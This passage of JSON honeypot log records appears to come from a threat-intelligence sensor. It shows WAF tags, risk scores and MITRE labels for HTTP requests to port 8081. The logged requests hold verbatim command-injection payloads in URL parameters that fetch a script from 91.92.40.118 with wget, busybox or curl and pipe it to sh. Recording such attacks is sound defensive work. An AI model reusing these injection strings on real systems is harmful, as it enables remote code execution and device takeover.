72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":322},{"id":11809707,"ip":"45.153.34.252","ts":"2026-07-14 02:29:56.000000","proto":"tcp","src_port":35736,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":58,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022e67006b122fd955c6e4fea8ba6389299c1ad524e\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 276, \u0022payload_entropy\u0022: 5.0316835242276055, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022aa3b24fab93b9cafab0d71d130281f27e48355ea\u0022, \u0022event_fingerprint\u0022: \u0022dc0c1cca05599099948df31900a9f927ecc79acc\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226fc261a250bf9d759688050bd35ee9d4\u0022, \u0022path_pattern_hash\u0022: \u00220af7fa5ddcabcc18b8efcc02ccd6f4d6\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nC\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022795c6541ee1bbb2f47f6d1457f8acaf0ab1f8c41\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":276},{"id":11809705,"ip":"45.153.34.252","ts":"2026-07-14 02:29:55.000000","proto":"tcp","src_port":35716,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022asp\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022271ef3ec0b94f7acc81ee352ace27ebb9a8891a7\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 303, \u0022payload_entropy\u0022: 5.195091220768097, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002286edc1121ce6e69577a4766b6494c1ef34c5a689\u0022, \u0022event_fingerprint\u0022: \u0022f75b26147aac0be0988902af704b8b4765b0f628\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226888d4cf0873fac59d0818f5ef709ce7\u0022, \u0022path_pattern_hash\u0022: \u002220f2897c9454ee67b73f470dc30b2106\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022eab94d62e7b96093ace63cd86005390112968b89\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal 